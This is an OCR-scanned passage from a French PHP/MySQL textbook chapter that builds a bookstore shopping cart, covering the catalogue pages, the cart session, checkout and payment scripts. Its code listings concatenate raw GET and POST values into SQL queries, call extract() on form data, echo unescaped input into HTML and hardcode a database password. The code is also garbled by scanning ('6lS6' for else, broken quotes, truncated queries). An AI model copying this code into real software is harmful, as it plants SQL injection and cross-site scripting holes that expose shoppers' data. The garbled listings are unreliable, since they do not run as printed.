display_button ( " edit_category_f orm . php?catid= " . $catid , 
"edit-category" , "Edit Category"); 

} else { 

display_button("index.php" , "continue-shopping" , 
"Continue Shopping"); 

} 

do_html_f ooter( ) ; 

?> 



La structure de ce script est tout a fait semblable a celle de la page d'accueil, a la diffe- 
rence que nous cherchons cette fois des livres et non des categories. 

Nous commencons avec session start ( ) , comme d'habitude, puis nous convertissons 
1'identificateur de la categorie que nous avons recu en un nom de categorie, grace a la 
fonction get category name() : 

$name = get_category_name($catid) ; 

Cette fonction recherche le nom de la categorie dans la base de donnees. Vous trouverez 
son code dans le Listing 26.7. 

Listing 26.7 : La fonction get_category_name() de bookjfns.php — Cette fonction 
convertit un identificateur de categorie en un nom de categorie 



function get_category_name($catid) { 

// Cherche dans la base de donnees le nom correspondant a un 

// identificateur de categorie. 

$conn = db_connect( ) ; 

$query = "select catname from categories 

where catid = '".$catid. ; 
$result = @$conn->query ($query) ; 
if (!$result) { 
return false; 

} 

$num_cats = @$result->num_rows ; 
if ($num_cats == 0) { 
return false; 

} 

$row = $result->fetch_object( ) ; 
return $row->catname ; 

} 
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Apres avoir recupere le nom de la categorie, nous pouvons afficher un en-tete HTML et 
continuer notre traitement en affichant la liste des livres de la base de donnees qui 
appartiennent a la categorie specifiee : 

$book_array = get_books($catid) ; 
display_books($book_array) ; 

Les fonctions get books () et display books () ressemblant beaucoup aux fonctions 
get categories () et display categories ( ), nous ne les presenterons pas ici. La 
seule difference est que nous cherchons des informations dans la table books, au lieu de 
les chercher dans la table categories. 

La fonction display books ( ) fournit un lien vers chaque livre de la categorie, via le 
script showjbook.php. Une fois encore, chaque lien est accompagne d'un parametre. 
Cette fois-ci, il s'agit du code ISBN du livre en question. 

A la fin du script de show_cat.php, vous verrez qu'une partie du code s'occupe d'affi- 
cher d'autres fonctions si l'utilisateur est un administrateur. Nous y reviendrons dans la 
section consacree aux fonctions d' administration. 



Afficher les informations relatives a un livre 

Le script show_book.php prend en parametre un code ISBN et affiche les informations 
associees au livre correspondant. Le code de ce script est presente dans le Listing 26.8. 

Listing 26.8 : show_book.php — Ce script affiche les informations relatives a un livre 
particulier 



<?php 

include ( ' book_sc_f ns . php ' ) ; 

// Le panier virtuel a besoin des sessions, done nous en ouvrons une. 
session_start( ) ; 

$isbn = $_GET[ ' isbn ' ] ; 

// Recupere ce livre dans la base de donnees. 
$book = get_book_details($isbn) ; 
do_html_header($book[ 'title' ] ) ; 
display_book_details($book) ; 

// Definit l'URL associee au bouton Continuer. 

$target = "index. php"; 
if ($book[ 'catid' ] ) { 

$target = "show_cat.php?catid=" .$book[ 'catid' ] ; 

} 

// En mode administration, affiche les liens de modification du livre. 
if (check_admin_user( ) ) { 
display_button( "edit_book_form.php?isbn=" .$isbn, "edit-item" , 
"Edit Item"); 

display_button ( "admin . php" , "admin-menu", "Admin Menu"); 
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display_button ($target , "continue", "Continue"); 
} else { 

display_button("show_cart.php?new=" .$isbn, "add-to-cart" , 

"Add" .$book[ 'title' ]. " To My Shopping Cart"); 
display_button ($target , "continue-shopping" , "Continue Shopping"); 

} 

do_html_f ooter( ) ; 
?> 



Une fois encore, le contenu de ce script ressemble beaucoup a celui des deux pages 
precedentes. Nous cornmencons par ouvrir une session, puis nous utilisons : 

$book = get_book_details($isbn) ; 

pour recuperer les informations du livre dans la base de donnees, puis : 

display_book_details($book) ; 

pour afficher les donnees en HTML. 

Notez que la fonction display book details ( ) cherche dans le repertoire images un 
fichier image pour le livre ayant pour nom son ISBN avec l'extension j pg. Si ce fichier 
n'existe pas, aucune image n'est afnchee. 

Le reste de ce script configure la navigation. Un utilisateur normal aura le choix entre 
les options Continue Shopping pour revenir a la page des categories et Add to Cart pour 
ajouter un livre dans son panier virtuel. Si un utilisateur a ouvert une session en tant 
qu'administrateur, il disposera d'options differentes que nous etudierons dans la section 
consacree a 1' administration. 

Ceci termine notre etude des fonctionnalites de base du systeme de catalogue. Nous 
allons maintenant nous interesser au code des fonctionnalites du panier virtuel. 

Implementation du panier virtuel 

La fonctionnalite du panier virtuel fait intervenir une variable de session appelee cart. 
II s'agit d'un tableau associatif dont les cles sont les codes ISBN et les valeurs, les 
quantites. Par exemple, si nous ajoutons un exemplaire de ce livre dans notre panier 
virtuel, celui-ci contiendra : 

0672317842 => 1 

c'est-a-dire un seul exemplaire du livre dont le code ISBN est 06723 17842. Lorsque l'utili- 
sateur ajoute des livres dans son panier virtuel, ceux-ci sont ajoutes dans le tableau. Lors- 
que nous affichons le contenu du panier virtuel, nous nous servons du tableau cart pour 
consulter les informations associees aux articles selectionnes dans la base de donnees. 
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Nous nous servons egalement de deux autres variables de session pour controler l'affi- 
chage de l'en-tete dans les colonnes Total Items et Total Price. Ces variables sont appelees, 
respectivement, items et total price. 

Utiliser le script show_cart.php 

Interessons-nous maintenant a 1' implementation du panier virtuel en examinant le 
script show_cart.php. II s'agit du script qui affiche la page sur laquelle nous arrivons si 
nous cliquons sur les liens View Cart ou Add to Cart. Si nous appelons show_cart.php 
sans aucun parametre, nous obtenons le contenu de notre panier virtuel. Si nous 1' appe- 
lons avec un code ISBN en parametre, le livre correspondant a ce code est ajoute au 
panier virtuel. 

Pour mieux comprendre ce script, examinons la Figure 26.6. 
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Figure 26.6 

Le script show_cart.php sans aucun parametre se contente d'afficher le contenu de notre panier 
virtuel. 

Dans ce cas, nous avons clique sur le lien View Cart alors que notre panier virtuel etait 
vide, e'est-a-dire que nous n'avions selectionne aucun article a acheter. 

La Figure 26.7 represente notre panier virtuel apres avoir choisi deux livres. Dans ce 
cas, nous sommes arrives sur cette page en cliquant sur le lien Add to Cart de la page 
show_book.php correspondant a ce livre, PHP 5 et MySQL 5. Si vous examinez avec 
attention la barre contenant l'URL, vous constaterez que, cette fois-ci, le script a ete 
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appele avec un parametre. Ce parametre s'appelle new et il a la valeur 067231 7842, qui 
correspond au code ISBN du livre que nous venons d'ajouter dans le panier virtuel. 
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Figure 26.7 

Le script show_cart.php appele avec le parametre new ajoute un livre au panier virtuel. 

A partir de cette page, vous pouvez remarquer que nous avons deux autres options. 
Nous pouvons nous servir du bouton Save Changes pour modifier la quantite d'un arti- 
cle dans le panier virtuel. Pour cela, il suffit de modifier directement la quantite et de 
cliquer sur ce bouton. II s'agit en fait d'un bouton d'envoi qui nous ramene au script 
show_cart.php pour mettre a jour le panier virtuel. 

De plus, l'utilisateur peut cliquer sur le bouton Go to Checkout lorsqu'il a termine ses 
achats. Nous y reviendrons dans un instant. 

Le Listing 26.9 contient le code du script show_cart.php. 

Listing 26.9 : showjcart.php — Ce script controle le panier virtuel 

<?php 

include ( 'book_sc_fns.php' ) ; 

// Le panier virtuel a besoin des sessions, done nous en ouvrons une. 
session_start( ) ; 

@$new = $_GET[ 1 new 1 ] ; 

if($new) { 

// Nouvel article choisi 
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if ( !isset($_SESSION[ 'cart ' ] ) ) { 
$_SESSION[ 'cart 1 ] = array(); 
$_SESSI0N[ 'items' ] = 0; 
$_SESSION [ ' total_price ' ] ='0.00'; 

} 

if (isset($_SESSION[ 'cart ' ] [$new] ) ) { 
$_SESSION [ ' cart ' ] [ $new] ++ ; 

} 6lS6 { 

$_SESSION[ 'cart' ] [$new] = 1; 

} 

$_SESSI0N[ 'total_price' ] = calculate_price($_SESSION[ ' cart ' ] ) ; 
S_SESSI0N[ ' items ' ] = calculate_items($_SESSION[ ' cart ' ] ) ; 

} 

if(isset($_POST['save'])) { 

foreach ($_SESSION[ ' cart ' ] as $isbn => $qty) { 
if ($_P0ST[$isbn] == '0') { 

unset ($_SESSI0N[ 'cart' ] [$isbn]) ; 

} 6lS6 { 

$_SESSION[ 'cart' ] [$isbn] = $_P0ST[$isbn] ; 

} 

} 

$_SESSI0N[ 'total_price ' ] = calculate_price($_SESSION[ ' cart ' ] ) ; 
S_SESSI0N[ ' items ' ] = calculate_items($_SESSION[ ' cart 1 ] ) ; 

} 

do_html_header( "Your shopping cart"); 

if (($_SESSION[ 'cart']) && (array_count_values ($_SESSION [ ' cart ' ] ) ) ) { 

display_cart($_SESSION[ 'cart' ] ) ; 
} else { 

echo "<p>There are no items in your cart</p><hr/>" ; 

} 

$target = "index. php" ; 

// Si on vient juste d'ajouter un article au panier, on continue 
// les achats dans cette categorie 
if($new) { 

Sdetails = get_book_details($new) ; 

if ($details[ 'catid' ] ) { 
$target = "show_cat . php?catid=" .$details[ ' catid '] ; 

} 

} 

display_button($target, "continue-shopping" , "Continue Shopping"); 

// Servez-vous de ce code si vous avez configure SSL 

// $path = $_SERVER[ 'PHP_SELF' ] ; 

// $server = $_SERVER[ 'SERVER_NOM' ] ; 

// $path = str_replace( 'show_cart.php' , '', $path); 

// display_button( "https: // " . Sserver .$path . "checkout . php" , 

// "go-to-checkout" , "Go To Checkout" ) ; 

// si vous n'employez pas SSL : 

display_button( "checkout. php" , "go-to-checkout", "Go To Checkout"); 
do_html_f ooter( ) ; 
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Ce script peut etre decompose en trois parties principales : l'affichage du panier virtuel, 
l'ajout d'articles dans le panier virtuel et l'enregistrement des modifications apportees 
au panier virtuel. Nous allons les etudier dans les trois prochaines sections. 

Afficher le panier virtuel 

Quelle que soit la page de provenance, nous affichons le contenu du panier virtuel. Dans 
la configuration de base, lorsqu'un utilisateur vient de cliquer sur View Cart, voici la 
seule partie du code qui sera executee : 

if ( ($_SESSI0N[ 'cart 1 ] ) && (array_count_values($_SESSION[ 'cart 1 ] ) ) ) { 
display_cart($_SESSION[ 1 cart 1 ] ) ; 
} else { 

echo "<p>There are no items in your cart</p><hr/>" ; 

} 

Comme vous pouvez le constater, nous appelons la fonction display cart() si le 
panier virtuel contient des articles. En revanche, si le panier est vide, nous affichons un 
message adapte. 

La fonction display cart() se contente d'afficher le contenu du panier virtuel au 
format HTML, comme vous pouvez le voir aux Figures 26.6 et 26.7. Le code de cette 
fonction se trouve dans output f ns.php et il est presente dans le Listing 26.10. Bien 
qu'il s'agisse d'une fonction d'affichage, elle est suffisamment complexe pour meriter 
de figurer ici. 

Listing 26.10 : La fonction display _cart() de outputjfns.php — Cette fonction formate 
et affiche le contenu du panier virtuel 



function display_cart ($cart , $change = true, $images = 1) { 
// Affiche les articles du panier virtuel. 
// Permet eventuellement les modifications (true ou false) 
// Inclut eventuellement les images (1 = oui ou = non) 



echo "<table border=\"0\" width=\"100%\" cellspacing=\ "0\ "> 
<form action=\"show_cart.php\" method=\ "post\ "> 
<tr><th colspan=\" " . (1 + $images)."\" 
bgcolor=\ "#cccccc\ ">Item</th> 
<th bgcolor=\ "#cccccc\ ">Price</th> 
<th bgcolor=\ "#cccccc\ ">Quantity</th> 
<th bgcolor=\ "#cccccc\ ">Total</th> 
</tr>"; 

// Affiche chaque article dans une ligne du tableau, 
foreach ($cart as $isbn => $qty) { 
$book = get_book_details($isbn) ; 
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echo "<tr>"; 
if($images == true) { 
echo "<td align=\"left\">"; 
if (f ile_exists( "images/ " .$isbn .". j pg " ) ) { 

$size = GetImageSize( "images/ " .$isbn. " . j pg " ) ; 
if(($size[0] > 0) && ($size[1] > 0)) { 
echo "<img src=\ "images/ ". $isbn .". j pg\ " 
style=\ "border: 1px solid black\" 
width=\" ".($size[0]/3)."\" 
height=\" " . ($size[1 ] /3) . " \ "/>" ; 

} 

} else { 

echo "  " ; 

} 

echo "</td>"; 

} 

echo "<td align=\"left\"> 

<a href=\"show_book.php?isbn=" .$isbn. "\">" .$book[ 'title' ] . "</a> 
by " .$book[ 'author' ]. "</td> 

<td align=\"center\">\$" .number_format($book[ 'price' ] , 2) 
. "</td> 

<td align=\"center\">" ; 

// Si les modifications sont acceptees, on affiche les quantites 
// dans des boites de texte. 
if ($change == true) { 

echo "<input type=\ "text\ " name=\ " " .$isbn. " \ " value=\ " " .$qty . " \ " 
size=\"3\">"; 

} else { 
echo $qty; 

} 

echo "</td> 

<td align=\ "center\ ">\$" .number_format($book[ 'price' ]*$qty,2) . 
"</td> 
</tr>\n" ; 

} 

// Affiche la ligne des totaux 
echo "<tr> 

<th colspan=\ " " . (2+$images) . " \ " bgcolor=\ "#cccccc\ "> </td> 
<th align=\"center\" bgcolor=\ "#cccccc\ ">" . $_SESSI0N[ 'items' ] . 
"</th> 

<th align=\ "center\ " bgcolor=\ "#cccccc\ "> 

\$" .number_format($_SESSION[ ' total_price ' ] , 2) . " 
</th> 
</tr>"; 

// Affiche le bouton Save Changes 
if($change == true) { 
echo "<tr> 

<td colspan=\" " . (2+$images) . "\"> </td> 
<td align=\ "center\ "> 
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<input type=\ "hidden\ " name=\ " save\ " value=\ "true\ "/> 
<input type=\ "image\ " src=\"images/save-changes.gif \" 
border=\"0\" alt=\"Save Changes\"/> 

</td> 

<td> </td> 
</tr>" ; 

} 

echo "</f orm></table>" ; 

} 



Voici le flux de cette fonction : 

1. Effectuer une boucle sur tous les articles du panier virtuel et passer le code ISBN de 
chaque article a la fonction get book details ( ) , arm que nous puissions presenter 
un recapitulatif des informations relatives a chaque livre. 

2. Fournir une image pour chaque livre, s'il en existe une. Nous nous servons des 
attributs height et width des balises img de HTML pour reduire un peu la taille de 
l'image. II en resulte une legere distorsion des images, mais elles sont suffisam- 
ment petites pour que cela ne pose pas de probleme. Si cela vous gene, vous 
pouvez toujours modifier leur taille avec la bibliotheque gd que nous avons 
presentee au Chapitre 20 ou generer manuellement des images plus petites pour 
chaque produit. 

3. Transformer chaque entree du panier virtuel en un lien vers le livre correspondant, 
c'est-a-dire vers showjbook.php avec le code ISBN comme parametre. 

4. Si nous appelons la fonction avec le parametre change defini a true (ou s'il n'est 
pas defini, puisqu'il est a true par defaut), nous affichons les boites contenant les 
quantites d' articles dans un formulaire se terminant par le bouton Save Changes 
(lorsque nous nous servirons a nouveau de cette fonction apres que l'utilisateur 
aura regie sa commande, nous ferons en sorte qu'il ne puisse plus modifier sa 
commande). 

Cette fonction n'est pas tres complexe, mais elle s'occupe de plusieurs points importants, 
c'est pourquoi il peut etre interessant de 1' examiner avec attention. 

Ajouter des articles dans le panier virtuel 

Si un utilisateur arrive sur la page show_cart.php en cliquant sur le bouton Add To 
Cart, il faut s'occuper de sa derniere commande avant d'afficher le contenu de son 
panier virtuel. Vous devez en effet ajouter 1' article concerne au panier en suivant les 
etapes ci-apres. 
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Tout d'abord, si l'utilisateur n'avait pas encore ajoute d'article dans son panier virtuel, 
nous devons creer un nouveau panier virtuel : 

if ( !isset($_SESSION[ 'cart 1 ] ) ) { 
$_SESSION[ 'cart' ] = array(); 
$_SESSION[ 'items' ] = 0; 
$_SESSION [ ' total_price ' ] ='0.00'; 

} 

Pour commencer, le panier virtuel est vide. 

Ensuite, apres avoir configure le panier virtuel, nous pouvons y ajouter 1' article : 

if (isset($_SESSION[ 'cart ' ] [$new] ) ) { 

$_SESSI0N [ ' cart ' ] [ $new] ++ ; 
} else { 

$_SESSI0N[ 'cart' ] [$new] = 1; 

} 

Dans cette partie du code, nous verifions si 1' article a deja ete ajoute dans le panier 
virtuel. Si c'est le cas, nous incrementons la quantite de cet article. Dans le cas 
contraire, nous ajoutons le nouvel article dans le panier virtuel. 

Ensuite, nous devons calculer le montant total de la commande et le nombre total d' articles 
dans le panier virtuel. Pour cela, nous faisons appel aux fonctions calculate price ( ) et 
calculate items ( ) : 

$_SESSI0N[ 'total_price' ] = calculate_price($_SESSION[ ' cart ' ] ) ; 
$_SESSI0N[ ' items ' ] = calculate_items($_SESSION[ ' cart ' ] ) ; 

Ces fonctions se trouvent dans la bibliotheque bookjns.php. Leur code est presente, 
respectivement, dans les Listings 26.11 et 26.12. 

Listing 26.11 : La fonction calculate _price() de book_fns.php — Cette fonction calcule 
et retourne le montant total de la commande du client 



function calculate_price ($cart ) { 

// Calcule la somme des prix de tous les articles du panier 
$price = 0.0; 
if (is_array($cart) ) { 
$conn = db_connect( ) ; 
f oreach ($cart as $isbn => $qty) { 

$query = "select price from books where isbn=' " .$isbn. " 
$result = $conn->query ($query) ; 
if ($result) { 
$item = $result->fetch_object( ) ; 
$item_price = $item->price ; 
$price +=$item_price*$qty ; 

} 

} 

} 

return $price; 

} 
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Comme vous pouvez le constater, la fonction calculate price () va chercher le prix 
de chaque article du panier virtuel dans la base de donnees. Cette approche etant un peu 
lente, nous enregistrons les prix (et le nombre total d' articles) dans des variables de 
session que nous ne recalculerons que lorsque le contenu du panier virtuel est modifie. 

Listing 28.12 : La fonction calculate JtemsQ de bookjfns.php — Cette fonction calcule 
et retourne le nombre total d'articles du panier virtuel 



function calculate_items ($cart ) { 

// Calcule le nombre d'articles total dans le panier 
$items = 0; 

if (is_array($cart) ) { 

f oreach ($cart as $isbn => $qty) { 
$items += $qty; 

} 

} 

return $items; 

} 



La fonction calculate items ( ) est plus simple puisqu'elle se contente de parcourir le 
panier virtuel et d'ajouter les quantites des differents articles pour obtenir le nombre 
total d'articles en utilisant la fonction array sum ( ) . S'il n'y a pas encore de tableau (si 
le panier virtuel est vide), elle renvoie simplement (zero). 

Enregistrer le panier virtuel modifie 

Si l'utilisateur parvient au script show_cart.php en cliquant sur le bouton Save Chan- 
ges, le processus est un peu different. Dans ce cas, nous arrivons sur la page via un 
formulaire d'envoi. Si vous examinez le code attentivement, vous verrez que le bouton 
Save Changes est en fait le bouton d'envoi d'un formulaire qui contient la variable 
cachee save. Si cette variable est definie, nous savons que nous sommes arrives sur ce 
script avec le bouton Save Changes. Cela signifie que l'utilisateur a probablement 
modifie des quantites dans son panier virtuel et que nous devons les mettre a jour. 

Si vous revenez aux champs de texte dans la partie du script display cart ( ) du fichier 
output Jns.php qui est consacree au formulaire Save Changes, vous constaterez que 
leur nom provient du code ISBN de l'article qu'ils represented : 

echo "<input type=\ "text\ " name=\ " " .$isbn . " \ " value=\ " " .$qty . "\ " 
size=\"3\">"; 

Interessons-nous maintenant a la partie du script qui enregistre les modifications : 

if (isset($_POST[ 'save' ] ) ) { 
foreach ($_SESSI0N[ ' cart ' ] as $isbn => $qty) { 
if ($_P0ST[$isbn] == '0') { 

unset ($_SESSI0N[ 'cart' ] [$isbn] ) ; 
} else { 
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S_SESSION[ 'cart ' ] [$isbn] = $_POST[$isbn] ; 

} 

} 

$_SESSION[ 'total_price' ] = calculate_price($_SESSION[ ' cart ' ] ) ; 
$_SESSION[ ' items ' ] = calculate_items($_SESSION[ 'cart ' ] ) ; 

} 

Vous pouvez constater que nous parcourons le panier virtuel et que, pour chaque isbn 
du panier virtuel, nous verifions la variable POST qui porte ce nom. II s'agit des champs 
provenant du formulaire Save Changes. 

Si l'un de ces champs vaut 0, nous supprimons l'article correspondant du panier virtuel 
a l'aide de unset () . Sinon nous mettons a jour le panier virtuel pour qu'il corresponde 
aux champs du formulaire, comme ceci : 

if ($_P0ST[$isbn] == '0') { 

unset ($_SESSI0N[ 'cart ' ] [$isbn] ) ; 
} else { 

$_SESSI0N[ 'cart' ] [$isbn] = $_P0ST[$isbn] ; 

} 

Apres ces mises a jour, nous appelons une fois de plus calculate price () et 
calculate items ( ) pour determiner les valeurs des variables de session total price 
et items. 

Afficher une barre d'en-tete de resume 

Vous avez deja remarque que la barre d'en-tete de chaque page contient un resume du 
contenu du panier virtuel. Ce resume est produit en affichant la valeur des variables de 
session total price et items dans cette barre, a l'aide de la fonction do html header(). 

Ces variables sont enregistrees lors de la premiere visite de l'utilisateur sur la page 
show_cart.php. Nous devons egalement prendre en compte le cas ou l'utilisateur n'a 
pas encore visite cette page. Le code correspondant se trouve aussi dans la fonction 
do html header ( ) : 

if ( !$_SESSI0N[ 'items' ] ) { 
$_SESSI0N[ 'items' ] = '0' ; 

} 

if ( !$_SESSI0N[ 'total_price' ] ) { 
$_SESSI0N[ 'total_price' ] = '0.00'; 

} 

Reglement des achats 

Lorsque l'utilisateur clique sur le bouton Go to Checkout de son panier virtuel, cela 
active le script checkout.php. II est preferable que l'utilisateur accede a cette page et aux 
suivantes via SSL, mais 1' application exemple presentee ici ne vous y oblige pas. Pour 
plus d' informations sur SSL, reportez-vous au Chapitre 16. 
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La page du reglement des achats est presentee a la Figure 26.8. 



Figure 26.8 

Le script checkout. php 
recupere les informations 
relatives au client. 
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Ce script demande au client de saisir son adresse (et l'adresse de livraison si elle est 
differente). II s'agit d'un script tres simple dont le code est presente dans le 
Listing 26.13. 



Listing 26.13 : checkout.php — Ce script demande au client de saisir diverses informations 



<?php 

// Inclut nos fonctions. 
include ( 'book_sc_fns.php' ) ; 



// Le panier virtuel a besoin des sessions, done nous en ouvrons une. 
session_start() ; 



do_html_header( "Checkout" ) ; 



if ( ($_SESSION[ 'cart']) && (array_count_values ($_SESSION [ ' cart ' ] ) ) ) { 

display_cart($_SESSION[ 'cart' ] , false, 0); 

display_checkout_f orm( ) ; 
} else { 

echo "<p>There are no items in your cart</p>"; 

} 
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display_button( "show_cart.php" , "continue-shopping" , 
"Continue Shopping"); 

do_html_f ooter( ) ; 

?> 



Ce script ne contient aucune surprise particuliere. Si le panier virtuel est vide, le script 
avertit le client. Dans le cas contraire, il affiche le formulaire de la Figure 26.8. 

Si l'utilisateur clique sur le bouton Purchase en bas du formulaire, il arrive sur le script 
purchase.php, dont le resultat est represente par la Figure 26.9. 
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Figure 26.9 

Le script purchase.php recalcule les frais de livraison et le montant total de la commande, et 
demande au client de fournir des informations sur son moyen de paiement. 

Le code de ce script est legerement plus complique que celui de purchase.php. Vous le 
trouverez dans le Listing 26.14. 
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Listing 26.14 : purchase.php — Ce script enregistre les details de la commande dans la 
base de donnees et recupere les informations de paiement 



<?php 

include ( 'book_sc_fns.php' ) ; 

// Le panier virtuel a besoin des sessions, done nous en ouvrons une. 
session_start( ) ; 

do_html_header( "Checkout" ) ; 

// create short variable names 
$name = $_POST[ ' name ' ] ; 
$address = $_POST[ ' address '] ; 
$city = $_POST[ 'city' ] ; 
$zip = $_P0ST[ 'zip' ] ; 
$country = $_POST[ ' country '] ; 

// Si le formulaire est rempli 
if ( ($_SESSION[ 'cart' ] ) && ($name) && ($address) && ($city) 
&& ($zip) && ($country)) { 
// On peut l'inserer dans la base de donnees 
if (insert_order($_POST) != false ) { 

// Affiche le panier sans permettre sa modification et sans images. 
display_cart($_SESSION[ 'cart' ] , false, 0); 

display_shipping(calculate_shipping_cost ( ) ) ; 

// Obtient les details sur la carte de credit 
display_card_f orm($name) ; 

display_button( "show_cart.php" , "continue-shopping" , " 
Continue Shopping" ) ; 

} else { 

echo "<p>Could not store data, please try again. </p>"; 
display_button( 'checkout. php' , 'back', 'Back'); 

} 

} else { 

echo "<p>You did not fill in all the fields, please try again. </p><hr 
display_button( 'checkout. php' , 'back', 'Back'); 

} 

do_html_f ooter( ) ; 

?> 



L' algorithme utilise ici est assez simple : nous verifions si l'utilisateur a correcte- 
ment rempli le formulaire et nous ajoutons ses informations dans la base de 
donnees en appelant la fonction insert order (), qui se contente d'ajouter les 
informations relatives au client dans la base de donnees. Son code se trouve dans le 
Listing 26. 15. 
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Listing 26.15 : La fonction insert_order() de orderjfns.php — Cette fonction ajoute 
toutes les informations relatives a la commande du client dans la base de donnees 



<?php 

function process_card($card_details) { 

// Connexion a la passerelle de paiement ou utilisation de gpg pour 
// chiffrer et envoyer par mail, ou stockage dans la BD, si vous 
// preferez vraiment 

return true; 

} 

function insert_order($order_details) { 

// Extraction de order_details dans des variables 
extract ($order_details) ; 

// Initialise l'adresse de livraison avec l'adresse du client, 
if ( ( !$ship_name) && ( !$ship_address) && ( !$ship_city) 

&& ( !$ship_state) && (!$ship_zip) && ( !$ship_country) ) { 
$ship_name = $name; 
$ship_address = $address; 
$ship_city = $city; 
$ship_state = $state; 
$ship_zip = $zip; 
$ship_country = $country; 

} 

$conn = db_connect( ) ; 

// On veut inserer la commande dans une transaction. On en lance une 
// en desactivant autocommit. 
$conn->autocommit (FALSE) ; 

// Insertion de l'adresse du client 

$query = "select customerid from customers where 

name = ' " .$name. " ' and address = ' " .$address. " ' 
and city = '".$city."' and state = '".$state."' 
and zip = '".$zip."' and country = ' " .$country . " ' " ; 

$result = $conn->query ($query) ; 

if ($result->num_rows>0) { 

$customer = $result->f etch_obj ect ( ) ; 

$customerid = $customer->customerid ; 
} else { 

$query = "insert into customers values 
( 1 1 , 1 " .$name. " 1 , ' " .$address. " 1 , '" .$city. " ' , 

1 " .$state. " ' , 1 " .$zip. " ' , 1 " .$country. " 1 ) " ; 
$result = $conn->query ($query) ; 

if (!$result) { 
return false; 

} 

} 

$customerid = $conn->insert_id ; 
$date = date("Y-m-d") ; 
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$query = "insert into orders values 
('', 1 " .$customerid. "' , '" .$_SESSION[ ' total_price ' ] . "' , 

1 " . $date . " 1 , 1 " . PARTIAL . " ' , 111 . $ship_name . " ' , 
1 " .$ship_address. " 1 , 1 " .$ship_city. " 1 , 
1 " . $ship_state . " ' , '" . $ship_zip . "' , 
1 " .$ship_country . " ' ) " ; 

$result = $conn->query ($query) ; 
if (!$result) { 
return false; 

} 

$query = "select orderid from orders where 

customerid = ' " . $customerid . " ' and 

amount > (". $_SESSION[ 1 total_price ']."-. 001 ) and 

amount < ( " .$_SESSION[ 1 total_price ' ] . "+.001 ) and 

date = 1 " .$date. " 1 and 

order_status = 'PARTIAL' and 

ship_name = ' " . $ship_name . " ' and 

ship_address = ' " .$ship_address. " ' and 

ship_city = ' " .$ship_city. " ' and 

ship_state = ' " .$ship_state. " ' and 

ship_zip = ' " .$ship_zip. " ' and 

ship_country = ' " . $ship_country ; 

$result = $conn->query ($query) ; 

if ($result->num_rows>0) { 

$order = $result->f etch_obj ect ( ) ; 

$orderid = $order->orderid ; 
} else { 

return false; 

} 

// Insertion de chaque livre 

foreach($_SESSION[ ' cart ' ] as $isbn => $quantity) { 
$detail = get_book_details($isbn) ; 
$query = "delete from order_items where 

orderid = ' " . $orderid . " ' and isbn = '".$isbn. ; 
$result = $conn->query ($query) ; 
$query = "insert into order_items values 

( 1 " .$orderid. " ' , '".$isbn."', " .$detail[ ' price 1 ]." , 
Squantity) " ; 
$result = $conn->query ($query) ; 
if(!$result) { 
return false; 

} 

} 

// Fin de la transaction 
$conn->commit ( ) ; 
$conn->autocommit (TRUE) ; 

return $orderid; 



?> 
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Cette fonction est assez longue, parce que nous devons inserer les informations 
relatives au client, les details de la commande et les details de chaque livre 
commande. 

Notez que les differentes parties de l'insertion sont placees dans une transaction qui 
commence avec : 

$conn->autocommit ( FALSE) ; 

et se termine par : 

$conn->cominit ( ) ; 
$conn->autocommit(TRUE) ; 

II s'agit du seul endroit de cette application ou vous devez utiliser une transaction. 
Pourquoi n'y en a-t-il pas besoin ailleurs ? Examinez le code de la fonction 
db connect ( ) : 

function db_connect() { 

$result = new mysqli( ' localhost ' , 'book_sc', 'password', 'book_sc'); 
if (!$result) { 
return false; 

} 

$result->autocommit (TRUE) ; 
return $result; 

} 

Ce code est legerement different de celui utilise pour cette fonction dans les autres 
chapitres. Apres avoir cree la connexion a MySQL, vous devez activer le mode auto- 
commit afin de vous assurer que chaque instruction SQL sera automatiquement vali- 
dee, comme on l'a deja explique . Ensuite, lorsque vous souhaitez utiliser une 
transaction englobant plusieurs instructions, il suffit de desactiver le mode autocom- 
mit, de realiser la serie d'insertions, de valider les donnees et de reactiver le mode 
autocommit. 

Nous calculons ensuite les frais de livraison en fonction de l'adresse du client et nous 
les affichons avec la ligne suivante : 

display_shipping(calculate_shipping_cost ( ) ) ; 

La fonction calculate shipping cost() renvoie toujours la meme somme, 20 €. 
Pour un site reel, vous devrez choisir un moyen d' expedition, determiner combien il 
vous en coutera pour les differentes destinations et calculer les frais d' envoi en 
consequence. 

Nous affichons ensuite un formulaire permettant au client de saisir les informations de 
sa carte de credit, grace a la fonction display card form() de la bibliotheque 
output _fns.php. 
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Implementation du paiement 

Lorsqu'un utilisateur clique sur le bouton Purchase, les details de paiement sont traites 
par le script process.php. La Figure 26. 10 represente le resultat d'un paiement reussi. 



Figure 26.10 

La transaction est 
reussie, les articles 
doivent maintenant 
etre envoyes. 
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Le code de process.php se trouve dans le Listing 26.16. 



Listing 26.16 : process.php — Ce script prend en charge le traitement du paiement et 
affiche son resultat 



<?php 

include ( 'book_sc_fns.php' ) ; 

// Le panier virtuel a besoin des sessions, done nous en ouvrons une. 
session_start() ; 

do_html_header( ' Checkout ' ) ; 



$card_type = $_P0ST[ 1 card_type 1 ] ; 
$card_number = $_POST[ ' card_number ' ] ; 
$card_month = $_P0ST[ 1 cardjnonth 1 ] ; 
$card_year = $_P0ST[ ' card_year 1 ] ; 
$card_name = $_P0ST[ 1 card_name ' ] ; 



if ( ($_SESSION[ 1 cart ' ] ) && ($card_type) && ($card_number) && 
($card_month) && ($card_year) && ($card_name) ) { 
// Affiche le panier sans autoriser de modification et sans image. 
display_cart($_SESSION[ 'cart' ] , false, 0); 
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display_shipping(calculate_shipping_cost ( ) ) ; 

if (process_card($_POST) ) { 
//empty shopping cart 
session_destroy ( ) ; 

echo "<p>Thank you for shopping with us. Your order has been 

placed. </p>" ; 
display_button( "index. php" , "continue-shopping" , 
"Continue Shopping"); 

} else { 

echo "<p>Could not process your card. Please contact the card 

issuer or try again. </p>"; 
display_button( "purchase. php" , "back", "Back"); 

} 

} else { 

echo "<p>You did not fill in all the fields, 

please try again. </p><hr />"; 
display_button( "purchase. php" , "back", "Back"); 

} 

do_html_f ooter( ) ; 

?> 



Nous traitons la carte de credit de l'utilisateur et, si tout s'est bien passe, nous fermons 
la session du client. 

Telle qu'elle est ecrite, la fonction qui s'occupe du traitement de la carte de credit se 
contente de renvoyer true. Dans le cadre d'une veritable implementation, il faudrait 
effectuer quelques verifications (valider la date d'expiration de la carte et s'assurer que 
les numeros sont corrects) avant de traiter le paiement. 

Pour un site reel, vous devez choisir un mecanisme de validation du paiement. Vous 
pouvez notamment : 

■ Faire appel a un service de validation des transactions. II existe dans ce cas plusieurs 
